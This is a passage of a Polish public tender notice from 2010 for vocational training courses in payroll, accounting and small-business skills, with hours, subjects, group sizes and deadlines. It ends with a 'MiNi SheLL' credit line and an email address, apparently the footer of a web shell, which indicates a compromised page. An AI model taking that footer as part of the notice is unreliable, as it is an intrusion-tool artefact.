	ubezpieczenia społeczne;
	płace;
	obsługa komputera;
	program PŁATNIK;
	pierwsza pomoc przedlekarska.

Zamówienie obejmuje łącznie przeszkolenie 40 osób, cztery grupy po 10 osób i realizowane będzie od podpisania umowy do 30 września 2010 r.
2.	RACHUNKOWOŚĆ PODMIOTÓW GOSPODARCZYCH.

Liczba godzin na szkoleniu musi wynosić min. 240 godz. i zawierać następujące przedmioty nauczania:

	podstawy księgowości;
	podstawy prawno - podatkowe prowadzenia działalności gospodarczej, rozliczenia       z Urzędem Skarbowym;
	rozliczenia z ZUS; 
	obsługa komputera;
	obsługa oprogramowania do integrowanego zarządzania organizacją (tzw. ERP) opartego na technologii SQL (silniki bazodanowe) - min. dwa programy finansowo - księgowe.

Zamówienie obejmuje łącznie przeszkolenie 20 osób, w dwóch grupach dziesięcioosobowych i realizowane będzie od podpisania umowy do 30 września 2010 r.

3.	ABC PRZEDSIĘBIORCZOŚCI.

Liczba godzin na szkoleniu musi wynosić min. 150 godz. i zawierać następujące przedmioty nauczania:

	podstawy prawne prowadzenia działalności gospodarczej;
	dokumenty i procedury związane z rejestrowaniem działalności gospodarczej;
	funkcjonowanie firmy;
	prowadzenie rozliczeń firmy z ZUS;
	prowadzenie rozliczeń firmy z Urzędem Skarbowym.
	obsługa kasy fiskalnej;
	obsługa urządzeń biurowych;
	operacyjna obsługa komputera;
	podstawowe zasady obsługi programu FK Symfonia;
	prowadzenie książki przychodów i rozchodów;
	podstawowe przepisy prawa pracy;
	dokumentacja handlowa, osobowa i administracyjna firmy;
	marketing i reklama w firmie;
	tworzenie biznesplanu;
	szef i pracownik - komunikacja interpersonalna - mobbing w pracy;
	przestrzeganie zasad higieny w procesie produkcji w obrocie żywnością (system GHP i HACCP).

Zamówienie obejmuje łącznie przeszkolenie 20 osób, w dwóch grupach dziesięcioosobowych i realizowane będzie od podpisania umowy do 30 września 2010 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com